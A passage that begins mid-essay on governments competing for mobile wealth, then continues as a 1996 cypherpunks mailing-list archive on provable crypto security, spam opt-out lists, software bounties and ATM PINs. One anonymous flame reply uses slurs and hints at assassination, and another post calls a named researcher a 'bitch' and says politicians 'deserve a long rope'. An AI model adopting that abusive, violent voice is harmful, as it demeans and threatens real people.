Clinton understands this. Like James Carville, he learned that the bond
market runs the most powerful polls of all. Clinton ran as a budget
conservative. 
 
The trend is already clear in monetary and fiscal matters, where the
competition for good government is the fiercest. Many of the abrupt
currency
swings of yesteryear--overnight devaluations, for example--just don't
happen
as much anymore. Wired financial markets are less volatile and much more
honest. Nearly all industrial countries have brought their annual
inflation 
rates
under 3%. In The Death of Inflation: Surviving & Thriving in the Zero Era
(Nicholas Brealey Publishing, 1996), Roger Bootle argues that the
globalization of financial and labor markets left them no choice. 
 
Within this country, large states like California seem to be learning the
same
lesson. They have to stay in line on tax rates, investment climate and so
forth--or lose jobs, investment and residents to their better-governed
neighbors. And while rigorous comparisons are difficult, it does appear
that
industrialized nations are gradually converging toward quite similar
regulatory
structures in monetary policy, banking, insurance and securities trading.
The
overall price that competing governments charge citizens for service--the
tax
rate--seems to be converging, too. Take away health insurance, which some
countries book as "private" rather than "public," and you find that the
tax
rates in industrialized countries are all quite close--much more so than
they
were in the 1960s. 
 
Governments that don't keep up with the competition can lose market share
fast. Years ago Delaware developed a well-designed service called
corporate law. Most big U.S. companies are Delaware corporations now.
Other states tried to protect their consumers from high interest rates.
So

Citibank set up operations in South Dakota to issue credit cards
nationally. In
June the Supreme Court ruled that California residents may not challenge
Citibank's late-payment fees as usurious under California law: The fees
on
Citibank cards are South Dakota's legal responsibility. The usury police
in
other states can all take a permanent vacation. 
 
We, the people, are all shipping tycoons now, with mobile wealth and
mobile
labor. We can choose Liberia's flag, for its unmeddlesome bureaucracy, or
London's insurance, for its trustworthy courts. As managers, workers and
consumers, we buy government in much the same way we buy shoes. Not
through bribes or political action committees or anything like that--we
buy it
by paying taxes and complying with the laws. But when shopping in one
government's mall gets too expensive or inconvenient, we shop in
another's. 
 
So the old political carnival, filled as it was with freaks and geeks, is
over.
The old game of big promises on election day, soon forgotten in the
enjoyment of power, is over. Citizens now vote continually, with London,
Bonn and Tokyo on the ballot, too. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Tue, 26 Nov 1996 04:18:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto
Message-ID: <9611261218.AA06559@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




 Dana W. Albrecht originally wrote:

 > Rigorous proofs of the non-existence of an algorithm are not new.  
 > Neither are rigorous proofs that any algorithm which can solve a given 
 > problem requires a minimal running time.  Or, in an even stronger sense, 

 > For a (non-cryptographic) example of a proof of the first sort --- that 
 > is, that "there exists no algorithm" --- consider the famous "Halting 
 > Problem" for Turing machines.  (I believe someone else has also 
 > mentioned this.)  There are many proofs such as this one, often related, 
 > though the Halting Problem itself is perhaps the most famous example.
 > 
 > For an (again, non-cryptographic) example of a proof of the second sort 
 > --- that is, that "any algorithm that solves a given problem requires a 
 > minimal running time" --- consider the proof that the "minimal" number 
 > of key comparisons in the worst case required to sort a random list of 
 > elements for which only an ordering relationship is known is O(nlog(n)).  
 > See Knuth, Volume 3, section 5.3.  For a simpler example, a standard 
 > "binary" search which requires O(log(n)) comparisons to find a given 
 > element in the worst case is provably the optimal algorithm for this 
 > task.

 Dana W. Albrecht (dwa@corsair.com) replies to
 The Deviant <deviant@pooh-corner.com> like this:
 
> Which part of this have you failed to understand?  Look in section 5.3.1
> of Volume 3 of "The Art of Computer Programming" by Knuth.  You will find
> there a rigorous proof that the "information theoretic lower bound" of
> an algorithm which sorts by comparison of keys is O(nlg(n)).


That is a bound on a _reliable_ algorithm.  A faster one is to shuffle
the elements and present it as sorted.  Lightning fast, but only with
low probability of correctness.  That is what we are up against in a key
search attack.  The other guy just might guess my 100 bit key first time,
millionth time or whatever - early enough anyway.

So to get a lower bound you have to show that a lucky guess cannot be
distinguished from an unlucky one - and if you do that without a one
time pad I take my hat off.

 
 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.ceddec.com>
Date: Tue, 26 Nov 1996 09:23:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Star Trek: First Contact
In-Reply-To: <199611230853.AAA10184@netcom6.netcom.com>
Message-ID: <Pine.LNX.3.95.961126115402.4290C-100000@deimos.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Nov 1996, Bill Frantz wrote:

> OBMoney: Picard states the they don't have money in the 24th century. 
> Instead they work for the good of mankind.  Nanotechnology must have made
> everything material possible, so the only reward left is status (aka
> reputation).

They travel faster than light, meet all kinds of life forms, 99.5% of
which are either humanoid of the same dimensions as terran humans too.
>From Gulliver (who had different sizes and species) to gullible.

They don't exchange anything?  DS9 indicated the academy used transporter
credits?  Replicator credits in Voyager?  Were they exchangable?  They
don't have money, they have credits.  They work for the good of mankind,
but get credits anyway.

Either space travel is paid for, or it is rationed, or both (I get on the
list, when my number nears the top, I change places with the highest
bidder).  How are finite (scarce) resources allocated?  A super computer
program (which may be considered fair, but I think the computer scientists
probably have the most luxuries in such a society).

Unless, earth decayed into a barter economy!

The Borg don't need money (individual exchange), but they don't seem to
have much use for minds (individual expression) either.

Acutally, Star-Trek is pure fiction.  Adam Smith and Ricardo proved
certain theorems in economics.  If Star Trek were at the same level of
science in astrophysics as economics, they would have to find a way
through the crystal spheres that let the sun and planets go around the
(flat) earth.  When they are not being bled to cure fevers (Captain - this
is Beverly Crusher - something terrible has happened - we've run out of
leeches!).

Economic Illiteracy is a problem.  People complain about not having wealth
but won't read the first book (Hidden Order by David Friedman is a good
start, he even has a web page with sample chapter and errata at
http://www.best.com/~ddfr).

Whither Latinum?

Actually one property of Latinum should be that it would be economically
inefficient to replicate or otherwise inflate.  Another that it should
have one or more unique properties that made it easy to authenticate.  And
it should be durable.  Gold had these in 1000 BC - Mines were few, A
"touchstone" could show if it was pure (v.s. dilution with silver), and it
doesn't rust.  In the 1800s fine-line engraving was the authentication and
anti-replication method of choice, since it was capital intensive to set
up, but you can tell if a geometric pattern is irregular.  Now we will
have cybercheques with digital signatures - forgeable if you have a
trillion dollars worth of computer time.

(see, it is on-topic).

tz@execpc.com
finger tz@execpc.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Kirksey <kkirksey@appstate.campus.mci.net>
Date: Tue, 26 Nov 1996 09:49:36 -0800 (PST)
To: "Alan Olsen" <alan@ctrl-alt-del.com>
Subject: re: sci fi
Message-ID: <199611261745.MAA19832@appstate-01.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


>(Where would this world be without Mark Twain (a nym for
>Samuel Clemmens), Maxwell Grant (the nym for Walter B. Gibson and others
>for the Shadow pulps), and the thousands of other nyms that appear in the
>publishing field?)

Heinlein used a few nyms.  His best stories were published under the 
names Robert Heinlein and Anson Macdonald.  The Heinlein/Macdonald split 
came about because John W. Campbell didn't want it to look like 
_Astounding_ was being dominated by one other, though the quailty of the 
stories was about the same. (All but a couple of dthe Future History 
stories were published under one of these names, but I don't remember 
which).  Heinlein used other nyms for stories of lesser quailty, or 
stories he sold to other markets in genres other than sf.   He created 
one nym to sell off stories that he described as "stinkeroos", and went 
so far as to get a separate PO Box in the name of this nym so that it 
couldn't be associated with Robert Heinlein.

Ken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Douglas Barnes <cman@c2.net>
Date: Tue, 26 Nov 1996 13:26:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
Message-ID: <2.2.32.19961126212424.00cba538@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



>>       SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
>
>BTW, this doesn't come with source code.
>

No, it does not come with source code. Site licenses and OEM
bundling packages will come with a source code option. Partners
who work with us in internationalizing the product may also
receive source code. However, it did not seem to be useful or
appropriate for a consumer-level product like this.

We are trying to find a happy medium between making sure that the
security is well-reviewed, and doing things that make business
sense and map onto standard industry practice for selling software
products. 

Note that SafePassage uses SSLeay for its encryption and SSL
protocol layer; SSLeay has publicly available source code, and has 
been extensively reviewed.

Douglas Barnes
C2Net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Mon, 25 Nov 1996 20:06:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: An interesting tid-bit
Message-ID: <3.0b36.32.19961126133618.006d8e9c@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


I was just testing out some new search software, and polled Alta Vista to
see how it all worked. I used "sex" as my search term, and Alta Vista
reported that their were "no documents matching - sex ignored"!

Interestingly enough it will let you search with other, sex-related terms
(such as "nude", "f*ck" etc), but not sex!

Very bizarre indeed.

Mark
Mark Neely - accessnt@ozemail.com.au
Lawyer, Internet Consultant, Professional Cynic & Author

BizWeb: For Serious Intrepreneurs - www.maximedia.com.au/bizweb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 26 Nov 1996 04:42:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199611261242.NAA09329@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


oh mindless aga,

>> This betrays your ignorance.  I.Q. is scaled according to age.  One does
>> not "improve."

Certainly not in your case.
 
>
>I have no ignorance, except for being ignorant of stupid people
>who call themselves "punks."

If you are ignorant of them, then how do you know that they are "stupid"?

>Look asshole; it says "LAW DOCTOR" -- that is what "Juris Doctor"
>means, stupid.  And I am about to stick the motherfucking Laws
>right up your cocksucking ASS!

How is this possible? It seems that you are possible of rather contemptible contortions!


>"Juris" means Law.  So Juris Doctor means "Law Doctor."

Clinging to technicalities here, aren't we?

>that is irrelevant, and you are off-topic.

Oooh! Oooh! Point the finger here, aga, at YOURSELF!

>Europe is also irrelevant, and you keep missing the point here.
>You have added the cypherpunks list again, and that was forbidden.

What a wonderful statement: Europe is irrelevant!!! A truly educated mind here. 

>look asshole, you really want that list killed, do you not?
>I have no bounds, as you will soon learn.

When one is clapped in irons and thrown into prison for whatever it is that your acts can be classified under, then I am pretty sure they have _some_ bounds.

>> > > Be careful who you threaten.  It might get you in trouble.

One wonders if you ever pay attention to what you actually write, aga?

>WRONG!  There is NO crime which covers anything that one does
>internationally!   And mailbombing is NOT "Unauthorized access,"
>regardless of where it occurs!

Uhm...oops, aga, you're wrong here, there are plenty of crimes that are international crimes. War crimes for example, which o against the Geneva convention. Child abduction crimes, which go against the Hague convention. But I am sure they will give you a slight slap on the  wrist, after all, you are only a stupid hillbilly with no idea of the law.

>Pitt-1975; Dissertation was in 1983 actions.  I practiced for
>six years, and then became perfect.  I currently do not practice for
>any parties other than myself, family, corporation or Institutes,
>and I need no license for that. And since I do not carry any
>license from any State, there is NOTHING that you can do to stop me.

Assassination comes to mind...

>The State disciplinary board has no jurisdiction, nor does any
>Law.  A Criminal Lawyer is a specialist in ripping new assholes
>on the witness stand, and that must now also be practiced on the net,
>it seems.  Remember, you are the one who asked for this, "Sadam."

You seem to have this absolute _fascination_ with asses, faggots, cocks, and ripping _new_ assholes (as if you weren't a big enough one already. This is obviously some sort of concious repression: you just can't face the truth, can you, aga?

>This is a world-wide internet problem that you are about to get
>taken care of.  You will be among the first locations to be
>eliminated.  And just remember that your termination is your own
>doing.  You had your chance to keep the fucking cypherpunks list
>OFF of your e-mail to me, and blew it.

Do we run and hide now, mommy?

>> I suggest a hobby which entails more physical activity.
>> 
>
>I pump iron and run three times a week.  And as a Tae Kwon Do
>black belt holder, I get lots of physical activity. I am in
>better physical shape than any other man that you know.

He/she/it pumps iron, does he/she/it? Whilst running? No mean feat for a thing without a brain. Assuming that you are better than anyone else you have probably never met, someone who probably has no desire to meet a thing like yourself, is yet another example of your sheer assonance!

>And just understand, as far as the internet is concerned, Europe does
>not mean SHIT!

Of course not...I am sure the European Internet thinks the same as you. After all, an inanimate object seems to think just as much as you!


--The Edge





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Tue, 26 Nov 1996 11:46:00 -0800 (PST)
To: snow@smoke.suba.com
Subject: Re: Bounty Server, Revisited.
Message-ID: <199611261946.NAA05804@bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain



>      The objective is to actually bring this system online. 

"cypherpunks write code."  good.

> Background:
> 
>      There is a lot of software floating around. It basically falls into
>      5 catagories: Commercial, Shareware, Freeware, Gnu (and other 
>      "Copyleft" schemes) and Public Domain. 
>      <Need to fill this in, but at this point we all know what the 5 types 
>      are> 
> 
>      It is the "Copylefted" software that interests me at this point. There
>      is quite a bit of high quality "Gnu" software, and at least one
>      operating system based on the GNU mentality (linux) however there 
>      is a dearth of _enduser_ tools such as mail and news readers for 
>      the more popular end user operating systems, word processors and 
>      graphics editing software, easy to use Graphic Design Software (TeX
>      is NOT easy to use) and easy to use Cryptographic software. 

many would pay good money for Linux native versions of programs like 
Wordperfect, Corelpaint & draw, Pagemaker , etc.

>     4) Desired "quality" level: Proof of Concept, Alpha, Beta, Release etc. 

Needs flesh.  What defines "alpha" or "beta" for purposes of bounty 
or is that up to the person initiating the bounty?
 
>     6) Where the initiators money is to go if the bounty is not claimed: 
>        I will provide a short (8 or 10) list of charities that the money 
>        will go to if the bounty is not met. This is to keep the initiator
>        honest, as well as the server. Each contributor will also get this 
>        choice. 

Do you have the charities in mind?  They should be listed in the 
abstract, I think.


Who will be publicize the initial bounty offer -- the server or 
bounty initiator?  Information about a specific software project will 
need to be disseminated beyond bounty.org.  


More details on conflict resolution are needed in a final draft.  The 
process and priorites the server administator will use to make his 
judgements should be abastractly discussed and possibly 1 or 2 
specific hypotheticals detailed.

me
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Tue, 26 Nov 1996 11:15:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [CRYPTO] Bank Cards, Interac, Bank Machines, etc
Message-ID: <961126141446_1586812475@emout02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-11-25 22:17:41 EST, you write:

> I also heard that the magnetic stripe on the back contains your card
>  number (the shiny metallized numbers on the front) encrypted using DES
>  using your PIN as the key.  Way out to lunch?  Too close for comfort?

This seems to be pretty unlikely, cuz I changed my PIN and was still able to
use the same card.  This means:

1) They can write to a card (pretty unlikely - but not ruling it out - jus
don't know)

2) There are more PINs to a card than one (pretty unlikely cuz I chose my
number)

What I suspect is:

Obtain card number
Obtain PIN
Send both to computer controlling transactions
This computer inputs both to an algorithm that says Yea or Nay to continuing
(like the numbers point to a valid check/credit/savings account or GL
account)...

Perform transaction (data likely encrypted the same way back and forth for
defeating listening devices)....

There may be a hash to the account, the result is not an account number, or
some huge look-up database is in play matching PINs to card numbers to
accounts.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Tue, 26 Nov 1996 13:01:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Dorthy Denning is a boot-licking fasicist!!!
Message-ID: <199611262215.QAA21070@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I don't know if anyone watched the House Subcomitty on Computers &
Technology today on C-Span.

Phil Zimmerman, Dorthy Denning, William Reinsch & others were disscussing
computer security.

Dorthy Denning gave the most pro-government speech I have ever heard. Is
this clueless bitch on the government payroll?!!

William Reinsch is a lying bastard. Fucking politions!! Fucking
goverment!! They all deserve a long rope!!

Phil Zimmerman was quite good at attacking the government policies.

<sigh> We are truly a country of fools to have put these jackbooted
facisit bastards back into office.

-- 
-----------------------------------------------------------
"William H. Geiger III" <whgiii@amaranth.com>
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Tue, 26 Nov 1996 15:54:14 -0800 (PST)
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
In-Reply-To: <199611251533.PAA00540@server.test.net>
Message-ID: <199611262353.PAA24264@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I'm curious as to how C2 is going about this `internationalization'

	'internationalization' refers not to ITAR, but to things such
as language in dialog boxes, using periods instead of commas, in
numbers, etc.

	All our development is done outside the US. We don't export
software with hooks, that's illegal.

-- 
Sameer Parekh					Voice:   510-986-8770
President					FAX:     510-986-8777
C2Net
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Tue, 26 Nov 1996 14:25:44 -0800 (PST)
To: iang@systemics.com>
Subject: Re: Bounty Server, Revisited.
Message-ID: <199611262225.QAA22449@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


(snip)
> BTW, bid to do what?  Using market terminology, I have assumed thay
> bid is to buy, that is provide cash.  Offer is to sell, that is provide
> software.  Ah, yes, bid is add to bounty.
(snip)

Ian and Snow,

I think it would be extremely valuable to have the ability to "offer" 
and to "bid".  If Joe Student has much spare time and wants to 
develop a tool for themselves they should also have the option to 
"offer" it to the bounty server.  If any one is interested, offers 
could be made.

Good luck to you both.  This sounds like it is coming along.

> TTFN
> iang.

Matt
 
_________________________________________________________________________
Matthew J. Miszewski                 |               <mjmiski@execpc.com>
Practice Crypto Civil Disobedience   |  Export your favorite Cryptosystem
-------------------------------------------------------------------------
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 26 Nov 1996 16:56:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto
Message-ID: <199611270034.QAA21978@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 7:03 AM 11/25/1996, Adam Back wrote:
>deGriz (sic) wrote:
>> At 4:18 AM 11/26/1996, Peter M Allan wrote:
>> >That is a bound on a _reliable_ algorithm.  A faster one is to shuffle
>> >the elements and present it as sorted.  Lightning fast, but only with
>> >low probability of correctness.  That is what we are up against in a key
>> >search attack.  The other guy just might guess my 100 bit key first time,
>> >millionth time or whatever - early enough anyway.
>> 
>> >So to get a lower bound you have to show that a lucky guess cannot be
>> >distinguished from an unlucky one - and if you do that without a one
>> >time pad I take my hat off.
>> 
>> If the chance of a successful guess is absurdly low, the algorithm can
>> be considered to be secure.  It is quite unlikely that you will guess
>> a random 128-bit key.  
>
>Agreed.  However you _can_ instantly verify once you have guessed.
>This makes the algorithm cryptographically secure, but _not_ perfectly
>secure as is the case with a OTP with a truly random pad.
>
>I think we agree, it is just a distinction in definitions of terms.

We are in agreement.  I would add, for the benefit of others, that it
is a good idea to keep in mind that the focus of our work is to build
physical systems which are secure.  For instance, we determine the
primality of numbers using probabilistic methods.  This is not
"perfect" in the sense that a OTP is, but it is certainly good enough
to bet somebody else's life on it.  ;-)

OTPs, for that matter, are engineering problems, too.  It is difficult
to find a random number generator in which we have complete
confidence.  If we buy a board from somebody, how do we know there
isn't a back door?  How do we know they did a good job?  Many
commercially available hardware random number generators are of
shockingly poor quality.  Caveat emptor.

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Tue, 26 Nov 1996 17:57:54 -0800 (PST)
To: tz@execpc.com
Subject: Re: Star Trek: First Contact
In-Reply-To: <Pine.LNX.3.95.961126115402.4290C-100000@deimos.ceddec.com>
Message-ID: <199611270201.SAA29256@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Are any of the characters in the new Star Trek gay?

I have heard rumor that Data was supposed to be.

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 26 Nov 1996 16:42:43 -0800 (PST)
To: omega@bigeasy.com
Subject: Re: Another Nutty Idea about SPAM
In-Reply-To: <199611261635.KAA04691@bigeasy.com>
Message-ID: <199611270037.SAA11474@algebra>
MIME-Version: 1.0
Content-Type: text


Omegaman wrote:
> Igor Chudov wrote:
> > Another nutty idea: to create a database of people who do NOT want to
> > receive unsolicited advertisements, and make it widely available.
> 
> Of course.  But this does not address the issue of "unscrupulous 
> spammers" which is what Steven was commenting upon.

Surely, you are right. See below, however.

> > The obvious problem is that some very uncsrupulous spammers would want
> > to grab this database and use it as a source of email addresses. 
> > 
> > This problem has a solution, however: instead of distributing people's
> > email addresses, distribute MD5 checksums of their addresses. For 
> > example, an entry for ichudov@algebra.com would be 
> > 
> > 	b51175dae78f25427351d5e3ff43de30
> > 
> > There is no way to guess the original text from an MD5 checksum.
> > 
> > Spammers should be advised to exclude all addresses with MD5 checksums from
> > that database from the recipient list, and include instructions on how
> > to get one added to the database into their spams.
> 
> Okay fine.  The spammer is "advised" but if he is unscrupulous in the 
> first place, he'll simply ignore the advice and continue bulk-mailing 
> to every address he can grab.  

In which case the spam-fighting mob will harass him.

> > Database maintainers could even provide a email filter-bot that would
> > accept recipient lists by email and send back the same lists, but
> > WITHOUT addresses that wish not to receive spam. This way stupid
> > low-tech spammers (who make up the majority) will be able to process
> > their email lists quickly and easily.
> 
> Indeed, stupid low-tech spammers would benefit from such a service if 
> they wish to honor "do not send" requests.
>  
> > This database may be maintained centrally. Users may be able to sign up
> > for inclusion into that database by email or by filling out a Web-based 
> > form. Identity verifications may be done by using cookie protocol.
> 
> I like the idea and if I had the resources, I would do it personally. 

I think that a regular unix account would have enough functionality
to implement it.

> Optimistically, many bulk e-mailers would sign on to the plan.  
> (Ironically, one would probably have to solicit bulk e-mailers to 
> sign up).  However, many, being unscrupulous, ignorant, etc. will not 
> be involved.
> 
> The only way I see to get bulk e-mailers to utilize this service is 
> to offer a positive and/or negative incentive for usage of the 
> service.  ie. "What do I gain by elminating people from my bulk 
> mail-outs?  What can be done if I don't follow this protocol?"
> 
> Ideas?  Comments?

I think that the incentive for spammers to actually use this service is
that spam-fighters can agree not to yank their accounts and not to
go after them if they use that "no spam please" database.

This arrangement basically makes everyone happy, for obvious reasons.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 26 Nov 1996 17:00:50 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: IPG Algorith Broken!
In-Reply-To: <849030305.93656.0@fatmans.demon.co.uk>
Message-ID: <199611270044.SAA11917@algebra>
MIME-Version: 1.0
Content-Type: text


paul@fatmans.demon.co.uk wrote:
> Perfect is a better term. Strictly speaking it is because there is no 
> finite unicity distance (the amount of ciphertext with which the 
> cipher can theoretically be broken). So, stricly speaking, for a given 
> message C and a prospective pad, P, out of a set of N pads which may 
> or may not be correct:
> 
> P(P|C) = N^-1

What does it mean?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zerkle@cs.ucdavis.edu (Dan Zerkle)
Date: Tue, 26 Nov 1996 19:26:59 -0800 (PST)
To: spam@zorch.sf-bay.org
Subject: Re: Another Nutty Idea about SPAM
Message-ID: <9611270326.AA20816@toadflax.cs.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain


(apologies if this appears twice...I'm easily confused)

> From: ichudov@algebra.com (Igor Chudov @ home)

> It is not illegal to make unsolicited phone calls. People must
> take an _action_ (request to be removed from call lists) in order
> not to be bothered.

Yes.  However, there is an organization that will send out such
a list to a large number of big companies that do telemarketing.
If any of those companies call any of the people on the list, they
each send a bill for $100.  If the bill isn't paid, they sue for
the money.  They always get the money.

The telemarketers really hate these people, which means that they
are doing their job.

So, for the spammers, what I'm proposing is not that people *need*
to take action to avoid getting spammed, but that they *can* take
action if they want to get paid for spam.

					-Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 26 Nov 1996 17:05:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: CHANGE: Visa-Free List - How to gain another nationality
Message-ID: <v0300780caec141bbec1d@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date:         Tue, 26 Nov 1996 14:22:07 -0600
Reply-To: sanwar@bclimser.demon.co.uk
Sender: NEW-LIST - New List Announcements <NEW-LIST@LISTSERV.NODAK.EDU>
From: Sanwar Ali <sanwar@bclimser.demon.co.uk>
Organization: BCL Immigration Services
Subject:      CHANGE: Visa-Free List - How to gain another nationality
To: NEW-LIST@LISTSERV.NODAK.EDU

   The VISA-FREE list has now had a change in address for all requests
   to the server.  Instead of it ending with pobox.com after the @ sign
   it will be majordomo.pobox.com.  Below are the new details for the
   list.

VISA-FREE on majordomo@majordomo.pobox.com

Discussion of how to gain another nationality for visa-free travel

VISA-FREE an unmoderated discussion list covering the problems
associated with international travel.  In particular the issues
discussed will cover acquiring a different nationality to overcome
these problems.  VISA-FREE is open to anyone wanting more information
on visa-free travel, or with useful tips about gaining another
nationality quickly.  It is also open to specialists in nationality
law.

Documentation covering the relevant laws of countries that grant their
citizenship quickly are archived at:

http://www.bclimser.demon.co.uk/bclgovnt.htm

Also information covering problems that people have experienced when
using a new passport will be covered.   There are archives of many of
the digests at:

http://www.bclimser.demon.co.uk/bclarchv.htm

There will also be an e-journal called "THE VISA-FREE JOURNAL" sent to
subscribers.  Anyone wishing to write to the list-owner directly to
discuss relevant issues and who does not wish this circulated to the
list may do so. The address is s.riley@pobox.com.  Please also state
whether you would mind if your comments are put into the journal.  The
list-owner will respect any requests for privacy.

*IMPORTANT: Anyone offering specialist assistance to VISA-FREE must
provide the list owner with the relevant laws applicable to any
citizenship programme offered, in the form of plain text to be
archived and made available to the list.  Also the legal basis of any
programme must be fully verified with the list owner before permission
is granted for circulation to the list.  This is to safeguard the
integrity of the list.  Permission will not be unreasonably withheld
from such people.  At the same time the list -owner reserves the right
to exclude those people who do not adhere to the purpose of the list,
engage in unnecessary flaming or offer services of a dubious nature.*

To subscribe to VISA-FREE, please send the message:

             SUBSCRIBE VISA-FREE           (without your name!)

                           or for the digest

             SUBSCRIBE VISA-FREE-DIGEST

to majordomo@majordomo.pobox.com

To send messages to the full list use  visa-free@majordomo.pobox.com

For messages to the list owner use  s.riley@pobox.com

Home Page: http://www.bclimser.demon.co.uk/bclvisfr.htm

Owner:  Sam Riley (AKA "Sanwar Ali")  s.riley@pobox.com

The list-owner's public key is:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAi/xbwUAAAEEALZolxs1l/DbYtEOIJV71EdsDepzR+DhLPPATIMwYiYgU9Yc
PRIa6aUI4VKrtz23/3Nz4pFP45kCfKUehsJ3oqtXzGWqCqIpPVm4q4d6oV44Csn5
EykR3ujlzYaCopzsYRD9E/EIaxVztnIantfLeN0IwQL0k9XazPkj64yNL1lpAAUR
tCRTYW0gUmlsZXkgPHNhbUBiY2xpbXNlci5kZW1vbi5jby51az4=
=nj7+
-----END PGP PUBLIC KEY BLOCK-----

                                 -------
Use this information at your own risk.  For more information and disclaimer
send E-mail to LISTSERV@LISTSERV.NODAK.EDU with the command  INFO NEW-LIST
in the body.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Tue, 26 Nov 1996 10:56:43 -0800 (PST)
To: snow@smoke.suba.com
Subject: Re: Bounty Server, Revisited.
Message-ID: <199611261858.TAA25374@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, Snow,

>      I have started drafting a proposal statement for the Bounty server. 

Wow, you've gotta move fast in this game :))

> Bounty Server, The proposal:
> Version 0.1
> 
> Abstract:
[chop where agreed or not disagreed]

> Background:
>      It is the "Copylefted" software that interests me at this point.

OK, although for my model, I am assuming that all forms are covered.

> The proposal:
> 
>     What I am going to attempt to do is to set up a "Bounty Server" where 
>     someone can iniate a "bounty" on a peice of technology. The initator
>     will write up a set of specifications for the technology, and an initial 
>     award to be paid to the developer. They then post it on the server and 
>     send their initial "bid" to the organization.  

Separate this out, for clarity of model.  The initiator (I used
Proposer, and called her Alice coz Alice always initiates) proposes
the specification, or task.  There is no need for Alice to submit an
initial bid, although they have that option, as a buyer.

BTW, bid to do what?  Using market terminology, I have assumed thay
bid is to buy, that is provide cash.  Offer is to sell, that is provide
software.  Ah, yes, bid is add to bounty.

>     This is the "bounty". Other people can add to this bounty, allowing the 
>     totals to add until someone claims that bounty by providing proof of 
>     development to the initiator of the bounty. In software terms they would 
>     upload the software to the server and notify the originator of the bounty,
>     and the server operators. Other technology will be figured out as it 
>     becomes necessary.

This is where I have put most of my efforts, because I need to design the
microstructure that is built into our market.

>     Originally I was going to put the stipulation in that the software written
